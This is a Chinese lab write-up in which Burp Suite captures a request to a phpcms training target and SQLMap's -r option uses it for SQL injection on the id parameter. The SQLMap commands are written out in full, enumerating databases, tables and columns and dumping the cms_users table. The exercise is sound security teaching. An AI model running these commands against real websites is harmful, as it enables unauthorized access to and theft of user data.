一. 实验目的
通过本实验理解SQLMap软件中-r参数的功能,掌握如何将burpsuit的代理抓包信息调用到SQLMap中来进行SQL注入,熟悉SQLMap的使用与注入流程与思路。
二. 实验环境
渗透平台:Kali
工具:SQLMap、Burpsuit
目标Web服务器:phpcms网站
三. 实验原理
SQLMAP的基础命令:
sqlmap -r “文档信息” –-dbs // 调用文档信息内容来列举数据库
sqlmap -r “文档信息” -v 1 -D “数据库” –-tables // 列举数据库的表名
sqlmap -r “文档信息” -v 1 -T “表名” -D “数据库” –-columns // 获取表的列名
sqlmap -r “文档信息” -v 1 -T “表名” -D “数据库” –-dump // 获取表中的字段数据信息
四. 实验内容
1、靶机phpstudy启动服务;
2、kali操作机访问目标网站http://远程IP:8083/,点击任意新闻页面;
3、开启抓包,抓取包含id参数网页,保存信息到文件;
4、利用sqlmap进行信息获取
五. 实验步骤
第一步 启动目标Web服务器
进入目标Web服务器,启动phpstudy,点击启动按钮,服务正常启动。
第二步 进入KALI平台,配置参数,访问目标Web服务器页面
1、访问目标Web服务器,输入URL参数http://远程IP:8083/
2、点击新闻页面
第三步 在KALI平台,Firefox浏览器设置代理监听端口与burpsuit代理抓包功能,将抓取request请求信息保存到info文档
1、Firefox浏览器设置代理监听端口
2、Burpsuit设置监听端口与Firefox的相一致
3、在开启burpsuit代理抓包的情况下,重新访问URL,抓取request信息,默认保存为/home/kali/
路径下,新建名info
第四步 在KALI平台,SQLMap软件采取-r参数读取info文档获取web服务器信息
1、使用参数-r
,读取/home/kali/info
文档信息
2、最后发现id是可以注入的
3、使用命令来获取数据库信息sqlmap –r info -p id --dbs
数据库信息如下
4、选取数据库cms来获取表信息sqlmap –r info -p id –D cms --tables
获取的表信息
5、选取数据库cms的cms_users表来获取字段信息sqlmap –r info -p id –D cms -T cms_users --columns
获取的字段信息
6、直接dump整体cms_user表sqlmap –r info -p id –D cms -T cms_users --dump
六. 思考与总结
通过本次实验,成功实现了SQLMap调用burpsuit代理抓包信息进行SQL注入,掌握如何高效利用其它工具信息来进行SQL注入。